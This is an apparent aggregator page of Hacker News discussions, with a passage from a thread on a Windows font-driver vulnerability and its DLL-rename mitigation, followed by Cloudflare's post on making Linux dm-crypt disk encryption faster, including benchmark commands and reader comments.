Then, if you want to support a variety of languages, you need to handle diacritics, ligatures, contextual shaping, and bidirectional text [4]. A character's appearance can very based on what comes before and after it. Or the base character can change appearance depending on the diacritics that are added to it. Some languages have complex rules about how you combine things, for example Thai [5].

If you want to support Emoji (and of course you do), then there's things like skin tone modifiers [6] and the zero-width joiner [7] that lets you make all kinds of crazy combinations.

Modern text rendering is, for better or worse, very complex.

[1] https://en.wikipedia.org/wiki/Kerning

[2] https://en.wikipedia.org/wiki/Font_hinting

[3] https://en.wikipedia.org/wiki/Subpixel_rendering

[4] http://scripts.sil.org/cms/scripts/page.php?site_id=nrsi&ite...

[5] https://www.unicode.org/L2/L2018/18216-thai-order.pdf

[6] http://www.unicode.org/reports/tr51/tr51-16.html#Emoji_Modif...

[7] http://www.unicode.org/reports/tr51/tr51-16.html#Emoji_ZWJ_S...

pcwalton(3006) 4 days ago [-]

> Well... why not make fonts with glyphs that are say, 5000 x 5000 pixels... and then instead of rendering for a particular size, line by line, stroke by stroke, curve by curve, why not instead use an interpolation algorithm to shrink that 5000 x 5000 pixel glyph to the exact size you want?

TrueType doesn't need a virtual machine to parse the vectors either, only to hint. Your proposal doesn't provide any hinting capability, so it doesn't solve the problems the VMs were created to solve. Moveto/lineto/curveto commands like TrueType uses are trivial and are not causing the issues here.

Fonts are going to be complex no matter what, largely because of international text and advanced typographic features. The real solution is to move to memory-safe implementations.

peter_d_sherman(262) 4 days ago [-]

A bunch of interesting comments, to be sure.

All I know is, the fonts (in ROM) in the original IBM-PC, or the Apple ][, or the C-64, or the Atari 800, or any other of the 64K computers of the 1980's -- never had a security issue with their (ROM bitmap) fonts.

That, and:

I challenge all of the naysayers to come up with a better solution than the one I have proposed...

Not all font-renderer/language experts, here, are we?

Neither am I.

That's the whole point.

A graphical shrink routine I can easily audit for security holes.

A font description language (an entire language mind you!) with lots of nuances -- how is any normal human being (much less rockstar programmer) supposed to audit one of those, with all of its possibilities, for security holes, in a single human lifetime?

We've seen some very subtle manipulation of these (evinced by this article), whether intentional or not...

A simple graphical shrink routine -- is orders of magnitudes more transparent and auditable than font description languages, or their interpreters...

You want a better solution?

Come up with one and tell me what it is!

I'm listening...

monadic2(10000) 4 days ago [-]

> Usually, font renderers are Turing complete in some way, and usually this opens up security concerns, and rightfully so...

Most of the features of which I am aware in fonts are modeled as FSMs, which can certainly be turing complete but do not need to be. Off the top of my head you could figure out a "sane" max time for a "script" to run without any loss of font quality, though it would not technically comply with the intended functionality.

I am at a loss of words for why this was ever possible, although perhaps security didn't matter until this past decade and I am too young to remember how low priority it used to be.... certainly, putting anything in kernel space for performance reasons of all things seems ridiculous for desktop computing. I'll take a fucking massive performance hit to keep my data safer.

oefrha(4165) 4 days ago [-]

A font can have hundreds or thousands (see CJK) of glyphs, plus variants. Good luck distributing thousands of 5000x5000 bitmaps (easily in the GB range).

jjtheblunt(10000) 5 days ago [-]

"For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities."

mike_d(10000) 5 days ago [-]

Anyone running around actively exploiting a zero-day Windows font parsing exploit likely also has a sandbox escape exploit too.

SlowRobotAhead(10000) 5 days ago [-]

> The security flaw exists in the Adobe...

Imagine my surprise. Geez maybe it's not the best idea to allow Adobe to entirely run the font game?

Source: worked at Adobe years ago

jamesgeck0(10000) 5 days ago [-]

Downvoted because Adobe hasn't had anything to do with this code for like two decades.

klingonopera(4335) 5 days ago [-]

I imagine you're getting downvotes because of your smug hyperbole, but in essence, I wouldn't deny that that is a legit question (not the entire fontgame, I guess, but a core part of it anyway).

It's also one of the reasons to reduce use of proprietary software to a minimum. Especially, if it's a core component of the system. Flatline, it's an increased security risk you can't verify.

On a serious note: Are there legit reasons to have it being a core component?

mrpippy(3793) 5 days ago [-]

ATMFD strikes again, and undoubtedly not for the last time.

More info on the history of ATMFD (and some previous vulnerabilities): https://googleprojectzero.blogspot.com/2015/07/one-font-vuln...

r00fus(10000) 5 days ago [-]

Is there no way to simply remove this DLL or is it too widely used in core Windows?

nightfly(10000) 5 days ago [-]

'a kernel-mode Adobe Type Manager Font Driver' this is just such a crazy idea.

unnouinceput(10000) 5 days ago [-]

2 points:

1 - article has wrong info. Under Windows 10 the name is ATMLIB.DLL. ATMFD.DLL is the name for older version of Windows

2 - rename it. Here is the script to be used under an elevated command prompt (change name accordingly if Win10):

cd '%windir%\system32'

takeown.exe /f atmfd.dll

icacls.exe atmfd.dll /save atmfd.dll.acl

icacls.exe atmfd.dll /grant Administrators:(F)

rename atmfd.dll x-atmfd.dll

cd '%windir%\syswow64'

takeown.exe /f atmfd.dll

icacls.exe atmfd.dll /save atmfd.dll.acl

icacls.exe atmfd.dll /grant Administrators:(F)

rename atmfd.dll x-atmfd.dll

monadic2(10000) 4 days ago [-]

As someone with no knowledge of windows, what's with their naming scheme? Is this some DOS remnant? Without context the name alone would be reason to fail code review.

cawvid(10000) 4 days ago [-]

ATMLIB is just a client library, it doesn't process any fonts itself, it's not the same thing as ATMFD.

In Windows 10, they changed it so the ATMFD code runs sandboxed in fontdrvhost.exe, and eventually removed it completely from the kernel, that's why atmfd.dll is not there on later editions.

shbooms(10000) 4 days ago [-]

> 1 - article has wrong info. Under Windows 10 the name is ATMLIB.DLL. ATMFD.DLL is the name for older version of Windows

I don't think they have the wrong info. According to the MS advisory they linked (https://portal.msrc.microsoft.com/en-us/security-guidance/ad...) it would appear that ATMLIB.dll is not actually affected as there is no mention of it at all, only ATMFD.dll. Also implied by the advisroy is that ATMFD.dll is present on Windows 10 but only versions prior to 1709:

> Rename ATMFD.DLL

> Please note: ATMFD.DLL is not present in Windows 10 installalations starting with Windows 10, version 1709. Newer versions do not have this DLL.

asimops(10000) 4 days ago [-]

Please keep in mind that you need to localize 'Administrators' to make this work on non english systems. When deploying this, it would be better to replace the name with the groups sid. I am on mobile right now but some fellow hacker can surely provide them.

0x0(672) 4 days ago [-]

So does this mean that Windows 7 will forever be stuck with an easily(?) exploitable font engine vulnerability?

lexicality(10000) 4 days ago [-]

That's what end of life generally means. Look at what happened to XP...





Historical Discussions: Speeding up Linux disk encryption (March 25, 2020: 483 points)

(486) Speeding up Linux disk encryption

486 points 3 days ago by jgrahamc in 23rd position

blog.cloudflare.com | Estimated reading time – 36 minutes | comments | anchor

Data encryption at rest is a must-have for any modern Internet company. Many companies, however, don't encrypt their disks, because they fear the potential performance penalty caused by encryption overhead.

Encrypting data at rest is vital for Cloudflare with more than 200 data centres across the world. In this post, we will investigate the performance of disk encryption on Linux and explain how we made it at least two times faster for ourselves and our customers!

Encrypting data at rest

When it comes to encrypting data at rest there are several ways it can be implemented on a modern operating system (OS). Available techniques are tightly coupled with a typical OS storage stack. A simplified version of the storage stack and encryption solutions can be found on the diagram below:

On the top of the stack are applications, which read and write data in files (or streams). The file system in the OS kernel keeps track of which blocks of the underlying block device belong to which files and translates these file reads and writes into block reads and writes, however the hardware specifics of the underlying storage device is abstracted away from the filesystem. Finally, the block subsystem actually passes the block reads and writes to the underlying hardware using appropriate device drivers.

The concept of the storage stack is actually similar to the well-known network OSI model, where each layer has a more high-level view of the information and the implementation details of the lower layers are abstracted away from the upper layers. And, similar to the OSI model, one can apply encryption at different layers (think about TLS vs IPsec or a VPN).

For data at rest we can apply encryption either at the block layers (either in hardware or in software) or at the file level (either directly in applications or in the filesystem).

Block vs file encryption

Generally, the higher in the stack we apply encryption, the more flexibility we have. With application level encryption the application maintainers can apply any encryption code they please to any particular data they need. The downside of this approach is they actually have to implement it themselves and encryption in general is not very developer-friendly: one has to know the ins and outs of a specific cryptographic algorithm, properly generate keys, nonces, IVs etc. Additionally, application level encryption does not leverage OS-level caching and Linux page cache in particular: each time the application needs to use the data, it has to either decrypt it again, wasting CPU cycles, or implement its own decrypted "cache", which introduces more complexity to the code.

File system level encryption makes data encryption transparent to applications, because the file system itself encrypts the data before passing it to the block subsystem, so files are encrypted regardless if the application has crypto support or not. Also, file systems can be configured to encrypt only a particular directory or have different keys for different files. This flexibility, however, comes at a cost of a more complex configuration. File system encryption is also considered less secure than block device encryption as only the contents of the files are encrypted. Files also have associated metadata, like file size, the number of files, the directory tree layout etc., which are still visible to a potential adversary.

Encryption down at the block layer (often referred to as disk encryption or full disk encryption) also makes data encryption transparent to applications and even whole file systems. Unlike file system level encryption it encrypts all data on the disk including file metadata and even free space. It is less flexible though - one can only encrypt the whole disk with a single key, so there is no per-directory, per-file or per-user configuration. From the crypto perspective, not all cryptographic algorithms can be used as the block layer doesn't have a high-level overview of the data anymore, so it needs to process each block independently. Most common algorithms require some sort of block chaining to be secure, so are not applicable to disk encryption. Instead, special modes were developed just for this specific use-case.

So which layer to choose? As always, it depends... Application and file system level encryption are usually the preferred choice for client systems because of the flexibility. For example, each user on a multi-user desktop may want to encrypt their home directory with a key they own and leave some shared directories unencrypted. On the contrary, on server systems, managed by SaaS/PaaS/IaaS companies (including Cloudflare) the preferred choice is configuration simplicity and security - with full disk encryption enabled any data from any application is automatically encrypted with no exceptions or overrides. We believe that all data needs to be protected without sorting it into 'important' vs 'not important' buckets, so the selective flexibility the upper layers provide is not needed.

Hardware vs software disk encryption

When encrypting data at the block layer it is possible to do it directly in the storage hardware, if the hardware supports it. Doing so usually gives better read/write performance and consumes less resources from the host. However, since most hardware firmware is proprietary, it does not receive as much attention and review from the security community. In the past this led to flaws in some implementations of hardware disk encryption, which render the whole security model useless. Microsoft, for example, started to prefer software-based disk encryption since then.

We didn't want to put our data and our customers' data to the risk of using potentially insecure solutions and we strongly believe in open-source. That's why we rely only on software disk encryption in the Linux kernel, which is open and has been audited by many security professionals across the world.

Linux disk encryption performance

We aim not only to save bandwidth costs for our customers, but to deliver content to Internet users as fast as possible.

At one point we noticed that our disks were not as fast as we would like them to be. Some profiling as well as a quick A/B test pointed to Linux disk encryption. Because not encrypting the data (even if it is supposed-to-be a public Internet cache) is not a sustainable option, we decided to take a closer look into Linux disk encryption performance.

Device mapper and dm-crypt

Linux implements transparent disk encryption via a dm-crypt module and dm-crypt itself is part of device mapper kernel framework. In a nutshell, the device mapper allows pre/post-process IO requests as they travel between the file system and the underlying block device.

dm-crypt in particular encrypts 'write' IO requests before sending them further down the stack to the actual block device and decrypts 'read' IO requests before sending them up to the file system driver. Simple and easy! Or is it?

Benchmarking setup

For the record, the numbers in this post were obtained by running specified commands on an idle Cloudflare G9 server out of production. However, the setup should be easily reproducible on any modern x86 laptop.

Generally, benchmarking anything around a storage stack is hard because of the noise introduced by the storage hardware itself. Not all disks are created equal, so for the purpose of this post we will use the fastest disks available out there - that is no disks.

Instead Linux has an option to emulate a disk directly in RAM. Since RAM is much faster than any persistent storage, it should introduce little bias in our results.

The following command creates a 4GB ramdisk:

$ sudo modprobe brd rd_nr=1 rd_size=4194304
$ ls /dev/ram0

Now we can set up a dm-crypt instance on top of it thus enabling encryption for the disk. First, we need to generate the disk encryption key, 'format' the disk and specify a password to unlock the newly generated key.

$ fallocate -l 2M crypthdr.img
$ sudo cryptsetup luksFormat /dev/ram0 --header crypthdr.img
WARNING!
========
This will overwrite data on crypthdr.img irrevocably.
Are you sure? (Type uppercase yes): YES
Enter passphrase:
Verify passphrase:

Those who are familiar with LUKS/dm-crypt might have noticed we used a LUKS detached header here. Normally, LUKS stores the password-encrypted disk encryption key on the same disk as the data, but since we want to compare read/write performance between encrypted and unencrypted devices, we might accidentally overwrite the encrypted key during our benchmarking later. Keeping the encrypted key in a separate file avoids this problem for the purposes of this post.

Now, we can actually 'unlock' the encrypted device for our testing:

$ sudo cryptsetup open --header crypthdr.img /dev/ram0 encrypted-ram0
Enter passphrase for /dev/ram0:
$ ls /dev/mapper/encrypted-ram0
/dev/mapper/encrypted-ram0

At this point we can now compare the performance of encrypted vs unencrypted ramdisk: if we read/write data to /dev/ram0, it will be stored in plaintext. Likewise, if we read/write data to /dev/mapper/encrypted-ram0, it will be decrypted/encrypted on the way by dm-crypt and stored in ciphertext.

It's worth noting that we're not creating any file system on top of our block devices to avoid biasing results with a file system overhead.

Measuring throughput

When it comes to storage testing/benchmarking Flexible I/O tester is the usual go-to solution. Let's simulate simple sequential read/write load with 4K block size on the ramdisk without encryption:

$ sudo fio --filename=/dev/ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=plain
plain: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=21013MB, aggrb=1126.5MB/s, minb=1126.5MB/s, maxb=1126.5MB/s, mint=18655msec, maxt=18655msec
  WRITE: io=21023MB, aggrb=1126.1MB/s, minb=1126.1MB/s, maxb=1126.1MB/s, mint=18655msec, maxt=18655msec
Disk stats (read/write):
  ram0: ios=0/0, merge=0/0, ticks=0/0, in_queue=0, util=0.00%

The above command will run for a long time, so we just stop it after a while. As we can see from the stats, we're able to read and write roughly with the same throughput around 1126 MB/s. Let's repeat the test with the encrypted ramdisk:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=1693.7MB, aggrb=150874KB/s, minb=150874KB/s, maxb=150874KB/s, mint=11491msec, maxt=11491msec
  WRITE: io=1696.4MB, aggrb=151170KB/s, minb=151170KB/s, maxb=151170KB/s, mint=11491msec, maxt=11491msec

Whoa, that's a drop! We only get ~147 MB/s now, which is more than 7 times slower! And this is on a totally idle machine!

Maybe, crypto is just slow

The first thing we considered is to ensure we use the fastest crypto. cryptsetup allows us to benchmark all the available crypto implementations on the system to select the best one:

$ sudo cryptsetup benchmark
PBKDF2-sha1      1340890 iterations per second for 256-bit key
PBKDF2-sha256    1539759 iterations per second for 256-bit key
PBKDF2-sha512    1205259 iterations per second for 256-bit key
PBKDF2-ripemd160  967321 iterations per second for 256-bit key
PBKDF2-whirlpool  720175 iterations per second for 256-bit key
     aes-cbc   128b   969.7 MiB/s  3110.0 MiB/s
 serpent-cbc   128b           N/A           N/A
 twofish-cbc   128b           N/A           N/A
     aes-cbc   256b   756.1 MiB/s  2474.7 MiB/s
 serpent-cbc   256b           N/A           N/A
 twofish-cbc   256b           N/A           N/A
     aes-xts   256b  1823.1 MiB/s  1900.3 MiB/s
 serpent-xts   256b           N/A           N/A
 twofish-xts   256b           N/A           N/A
     aes-xts   512b  1724.4 MiB/s  1765.8 MiB/s
 serpent-xts   512b           N/A           N/A
 twofish-xts   512b           N/A           N/A

It seems aes-xts with a 256-bit data encryption key is the fastest here. But which one are we actually using for our encrypted ramdisk?

$ sudo dmsetup table /dev/mapper/encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0

We do use aes-xts with a 256-bit data encryption key (count all the zeroes conveniently masked by dmsetup tool - if you want to see the actual bytes, add the --showkeys option to the above command). The numbers do not add up however: cryptsetup benchmark tells us above not to rely on the results, as 'Tests are approximate using memory only (no storage IO)', but that is exactly how we've set up our experiment using the ramdisk. In a somewhat worse case (assuming we're reading all the data and then encrypting/decrypting it sequentially with no parallelism) doing back-of-the-envelope calculation we should be getting around (1126 * 1823) / (1126 + 1823) =~696 MB/s, which is still quite far from the actual 147 * 2 = 294 MB/s (total for reads and writes).

dm-crypt performance flags

While reading the cryptsetup man page we noticed that it has two options prefixed with --perf-, which are probably related to performance tuning. The first one is --perf-same_cpu_crypt with a rather cryptic description:

Perform encryption using the same cpu that IO was submitted on.  The default is to use an unbound workqueue so that encryption work is automatically balanced between available CPUs.  This option is only relevant for open action.

So we enable the option

$ sudo cryptsetup close encrypted-ram0
$ sudo cryptsetup open --header crypthdr.img --perf-same_cpu_crypt /dev/ram0 encrypted-ram0

Note: according to the latest man page there is also a cryptsetup refresh command, which can be used to enable these options live without having to 'close' and 're-open' the encrypted device. Our cryptsetup however didn't support it yet.

Verifying if the option has been really enabled:

$ sudo dmsetup table encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0 1 same_cpu_crypt

Yes, we can now see same_cpu_crypt in the output, which is what we wanted. Let's rerun the benchmark:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=1596.6MB, aggrb=139811KB/s, minb=139811KB/s, maxb=139811KB/s, mint=11693msec, maxt=11693msec
  WRITE: io=1600.9MB, aggrb=140192KB/s, minb=140192KB/s, maxb=140192KB/s, mint=11693msec, maxt=11693msec

Hmm, now it is ~136 MB/s which is slightly worse than before, so no good. What about the second option --perf-submit_from_crypt_cpus:

Disable offloading writes to a separate thread after encryption.  There are some situations where offloading write bios from the encryption threads to a single thread degrades performance significantly.  The default is to offload write bios to the same thread.  This option is only relevant for open action.

Maybe, we are in the 'some situation' here, so let's try it out:

$ sudo cryptsetup close encrypted-ram0
$ sudo cryptsetup open --header crypthdr.img --perf-submit_from_crypt_cpus /dev/ram0 encrypted-ram0
Enter passphrase for /dev/ram0:
$ sudo dmsetup table encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0 1 submit_from_crypt_cpus

And now the benchmark:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=2066.6MB, aggrb=169835KB/s, minb=169835KB/s, maxb=169835KB/s, mint=12457msec, maxt=12457msec
  WRITE: io=2067.7MB, aggrb=169965KB/s, minb=169965KB/s, maxb=169965KB/s, mint=12457msec, maxt=12457msec

~166 MB/s, which is a bit better, but still not good...

Being desperate we decided to seek support from the Internet and posted our findings to the dm-crypt mailing list, but the response we got was not very encouraging:

If the numbers disturb you, then this is from lack of understanding on your side. You are probably unaware that encryption is a heavy-weight operation...

We decided to make a scientific research on this topic by typing 'is encryption expensive' into Google Search and one of the top results, which actually contains meaningful measurements, is... our own post about cost of encryption, but in the context of TLS! This is a fascinating read on its own, but the gist is: modern crypto on modern hardware is very cheap even at Cloudflare scale (doing millions of encrypted HTTP requests per second). In fact, it is so cheap that Cloudflare was the first provider to offer free SSL/TLS for everyone.

Digging into the source code

When trying to use the custom dm-crypt options described above we were curious why they exist in the first place and what is that 'offloading' all about. Originally we expected dm-crypt to be a simple 'proxy', which just encrypts/decrypts data as it flows through the stack. Turns out dm-crypt does more than just encrypting memory buffers and a (simplified) IO traverse path diagram is presented below:

When the file system issues a write request, dm-crypt does not process it immediately - instead it puts it into a workqueue named 'kcryptd'. In a nutshell, a kernel workqueue just schedules some work (encryption in this case) to be performed at some later time, when it is more convenient. When 'the time' comes, dm-crypt sends the request to Linux Crypto API for actual encryption. However, modern Linux Crypto API is asynchronous as well, so depending on which particular implementation your system will use, most likely it will not be processed immediately, but queued again for 'later time'. When Linux Crypto API will finally do the encryption, dm-crypt may try to sort pending write requests by putting each request into a red-black tree. Then a separate kernel thread again at 'some time later' actually takes all IO requests in the tree and sends them down the stack.

Now for read requests: this time we need to get the encrypted data first from the hardware, but dm-crypt does not just ask for the driver for the data, but queues the request into a different workqueue named 'kcryptd_io'. At some point later, when we actually have the encrypted data, we schedule it for decryption using the now familiar 'kcryptd' workqueue. 'kcryptd' will send the request to Linux Crypto API, which may decrypt the data asynchronously as well.

To be fair the request does not always traverse all these queues, but the important part here is that write requests may be queued up to 4 times in dm-crypt and read requests up to 3 times. At this point we were wondering if all this extra queueing can cause any performance issues. For example, there is a nice presentation from Google about the relationship between queueing and tail latency. One key takeaway from the presentation is:

A significant amount of tail latency is due to queueing effects

So, why are all these queues there and can we remove them?

Git archeology

No-one writes more complex code just for fun, especially for the OS kernel. So all these queues must have been put there for a reason. Luckily, the Linux kernel source is managed by git, so we can try to retrace the changes and the decisions around them.

The 'kcryptd' workqueue was in the source since the beginning of the available history with the following comment:

Needed because it would be very unwise to do decryption in an interrupt context, so bios returning from read requests get queued here.

So it was for reads only, but even then - why do we care if it is interrupt context or not, if Linux Crypto API will likely use a dedicated thread/queue for encryption anyway? Well, back in 2005 Crypto API was not asynchronous, so this made perfect sense.

In 2006 dm-crypt started to use the 'kcryptd' workqueue not only for encryption, but for submitting IO requests:

This patch is designed to help dm-crypt comply with the new constraints imposed by the following patch in -mm: md-dm-reduce-stack-usage-with-stacked-block-devices.patch

It seems the goal here was not to add more concurrency, but rather reduce kernel stack usage, which makes sense again as the kernel has a common stack across all the code, so it is a quite limited resource. It is worth noting, however, that the Linux kernel stack has been expanded in 2014 for x86 platforms, so this might not be a problem anymore.

A first version of 'kcryptd_io' workqueue was added in 2007 with the intent to avoid:

starvation caused by many requests waiting for memory allocation...

The request processing was bottlenecking on a single workqueue here, so the solution was to add another one. Makes sense.

We are definitely not the first ones experiencing performance degradation because of extensive queueing: in 2011 a change was introduced to conditionally revert some of the queueing for read requests:

If there is enough memory, code can directly submit bio instead queuing this operation in a separate thread.

Unfortunately, at that time Linux kernel commit messages were not as verbose as today, so there is no performance data available.

In 2015 dm-crypt started to sort writes in a separate 'dmcrypt_write' thread before sending them down the stack:

On a multiprocessor machine, encryption requests finish in a different order than they were submitted. Consequently, write requests would be submitted in a different order and it could cause severe performance degradation.

It does make sense as sequential disk access used to be much faster than the random one and dm-crypt was breaking the pattern. But this mostly applies to spinning disks, which were still dominant in 2015. It may not be as important with modern fast SSDs (including NVME SSDs).

Another part of the commit message is worth mentioning:

...in particular it enables IO schedulers like CFQ to sort more effectively...

It mentions the performance benefits for the CFQ IO scheduler, but Linux schedulers have improved since then to the point that CFQ scheduler has been removed from the kernel in 2018.

The same patchset replaces the sorting list with a red-black tree:

In theory the sorting should be performed by the underlying disk scheduler, however, in practice the disk scheduler only accepts and sorts a finite number of requests. To allow the sorting of all requests, dm-crypt needs to implement its own sorting.

The overhead associated with rbtree-based sorting is considered negligible so it is not used conditionally.

All that make sense, but it would be nice to have some backing data.

Interestingly, in the same patchset we see the introduction of our familiar 'submit_from_crypt_cpus' option:

There are some situations where offloading write bios from the encryption threads to a single thread degrades performance significantly

Overall, we can see that every change was reasonable and needed, however things have changed since then:

  • hardware became faster and smarter
  • Linux resource allocation was revisited
  • coupled Linux subsystems were rearchitected

And many of the design choices above may not be applicable to modern Linux.

The 'clean-up'

Based on the research above we decided to try to remove all the extra queueing and asynchronous behaviour and revert dm-crypt to its original purpose: simply encrypt/decrypt IO requests as they pass through. But for the sake of stability and further benchmarking we ended up not removing the actual code, but rather adding yet another dm-crypt option, which bypasses all the queues/threads, if enabled. The flag allows us to switch between the current and new behaviour at runtime under full production load, so we can easily revert our changes should we see any side-effects. The resulting patch can be found on the Cloudflare GitHub Linux repository.

Synchronous Linux Crypto API

From the diagram above we remember that not all queueing is implemented in dm-crypt. Modern Linux Crypto API may also be asynchronous and for the sake of this experiment we want to eliminate queues there as well. What does 'may be' mean, though? The OS may contain different implementations of the same algorithm (for example, hardware-accelerated AES-NI on x86 platforms and generic C-code AES implementations). By default the system chooses the 'best' one based on the configured algorithm priority. dm-crypt allows overriding this behaviour and request a particular cipher implementation using the capi: prefix. However, there is one problem. Let us actually check the available AES-XTS (this is our disk encryption cipher, remember?) implementations on our system:

$ grep -A 11 'xts(aes)' /proc/crypto
name         : xts(aes)
driver       : xts(ecb(aes-generic))
module       : kernel
priority     : 100
refcnt       : 7
selftest     : passed
internal     : no
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : __xts(aes)
driver       : cryptd(__xts-aes-aesni)
module       : cryptd
priority     : 451
refcnt       : 1
selftest     : passed
internal     : yes
type         : skcipher
async        : yes
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : xts(aes)
driver       : xts-aes-aesni
module       : aesni_intel
priority     : 401
refcnt       : 1
selftest     : passed
internal     : no
type         : skcipher
async        : yes
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : __xts(aes)
driver       : __xts-aes-aesni
module       : aesni_intel
priority     : 401
refcnt       : 7
selftest     : passed
internal     : yes
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64

We want to explicitly select a synchronous cipher from the above list to avoid queueing effects in threads, but the only two supported are xts(ecb(aes-generic)) (the generic C implementation) and __xts-aes-aesni (the x86 hardware-accelerated implementation). We definitely want the latter as it is much faster (we're aiming for performance here), but it is suspiciously marked as internal (see internal: yes). If we check the source code:

Mark a cipher as a service implementation only usable by another cipher and never by a normal user of the kernel crypto API

So this cipher is meant to be used only by other wrapper code in the Crypto API and not outside it. In practice this means, that the caller of the Crypto API needs to explicitly specify this flag, when requesting a particular cipher implementation, but dm-crypt does not do it, because by design it is not part of the Linux Crypto API, rather an 'external' user. We already patch the dm-crypt module, so we could as well just add the relevant flag. However, there is another problem with AES-NI in particular: x86 FPU. 'Floating point' you say? Why do we need floating point math to do symmetric encryption which should only be about bit shifts and XOR operations? We don't need the math, but AES-NI instructions use some of the CPU registers, which are dedicated to the FPU. Unfortunately the Linux kernel does not always preserve these registers in interrupt context for performance reasons (saving/restoring FPU is expensive). But dm-crypt may execute code in interrupt context, so we risk corrupting some other process data and we go back to 'it would be very unwise to do decryption in an interrupt context' statement in the original code.

Our solution to address the above was to create another somewhat 'smart' Crypto API module. This module is synchronous and does not roll its own crypto, but is just a 'router' of encryption requests:

  • if we can use the FPU (and thus AES-NI) in the current execution context, we just forward the encryption request to the faster, 'internal' __xts-aes-aesni implementation (and we can use it here, because now we are part of the Crypto API)
  • otherwise, we just forward the encryption request to the slower, generic C-based xts(ecb(aes-generic)) implementation

Using the whole lot

Let's walk through the process of using it all together. The first step is to grab the patches and recompile the kernel (or just compile dm-crypt and our xtsproxy modules).

Next, let's restart our IO workload in a separate terminal, so we can make sure we can reconfigure the kernel at runtime under load:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...

In the main terminal make sure our new Crypto API module is loaded and available:

$ sudo modprobe xtsproxy
$ grep -A 11 'xtsproxy' /proc/crypto
driver       : xts-aes-xtsproxy
module       : xtsproxy
priority     : 0
refcnt       : 0
selftest     : passed
internal     : no
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64
ivsize       : 16
chunksize    : 16

Reconfigure the encrypted disk to use our newly loaded module and enable our patched dm-crypt flag (we have to use low-level dmsetup tool and cryptsetup obviously is not aware of our modifications):

$ sudo dmsetup table encrypted-ram0 --showkeys | sed 's/aes-xts-plain64/capi:xts-aes-xtsproxy-plain64/' | sed 's/$/ 1 force_inline/' | sudo dmsetup reload encrypted-ram0

We just 'loaded' the new configuration, but for it to take effect, we need to suspend/resume the encrypted device:

$ sudo dmsetup suspend encrypted-ram0 && sudo dmsetup resume encrypted-ram0

And now observe the result. We may go back to the other terminal running the fio job and look at the output, but to make things nicer, here's a snapshot of the observed read/write throughput in Grafana:

Wow, we have more than doubled the throughput! With the total throughput of ~640 MB/s we're now much closer to the expected ~696 MB/s from above. What about the IO latency? (The await statistic from the iostat reporting tool):

The latency has been cut in half as well!

To production

So far we have been using a synthetic setup with some parts of the full production stack missing, like file systems, real hardware and most importantly, production workload. To ensure we're not optimising imaginary things, here is a snapshot of the production impact these changes bring to the caching part of our stack:

This graph represents a three-way comparison of the worst-case response times (99th percentile) for a cache hit in one of our servers. The green line is from a server with unencrypted disks, which we will use as baseline. The red line is from a server with encrypted disks with the default Linux disk encryption implementation and the blue line is from a server with encrypted disks and our optimisations enabled. As we can see the default Linux disk encryption implementation has a significant impact on our cache latency in worst case scenarios, whereas the patched implementation is indistinguishable from not using encryption at all. In other words the improved encryption implementation does not have any impact at all on our cache response speed, so we basically get it for free! That's a win!

We're just getting started

This post shows how an architecture review can double the performance of a system. Also we reconfirmed that modern cryptography is not expensive and there is usually no excuse not to protect your data.

We are going to submit this work for inclusion in the main kernel source tree, but most likely not in its current form. Although the results look encouraging we have to remember that Linux is a highly portable operating system: it runs on powerful servers as well as small resource constrained IoT devices and on many other CPU architectures as well. The current version of the patches just optimises disk encryption for a particular workload on a particular architecture, but Linux needs a solution which runs smoothly everywhere.

That said, if you think your case is similar and you want to take advantage of the performance improvements now, you may grab the patches and hopefully provide feedback. The runtime flag makes it easy to toggle the functionality on the fly and a simple A/B test may be performed to see if it benefits any particular case or setup. These patches have been running across our wide network of more than 200 data centres on five generations of hardware, so can be reasonably considered stable. Enjoy both performance and security from Cloudflare for all!




All Comments: [-] | anchor

nullc(2095) 3 days ago [-]

> otherwise, we just forward the encryption request to the slower, generic C-based xts(ecb(aes-generic)) implementation

This seems like at least something of a bad idea, because that implementation (if my search-fu is correct) is:

https://github.com/torvalds/linux/blob/master/crypto/aes_gen...

Which is obviously not constant time, and will leak information through cache/timing sidechannels.

AES lends itself to a table based implementation which is simple, fairly fast, and-- unfortunately-- not secure if sidechannels matter. Fortunately, AES-NI eliminated most of the motivation for using such implementations on a vast collection of popular desktop hardware which has had AES-NI for quite a few years now.

For the sake of also being constructive, here is a constant time implementation in naive C for both AES encryption and decryption (the latter being somewhat hard to find, because stream modes only use the former):

https://github.com/bitcoin-core/ctaes

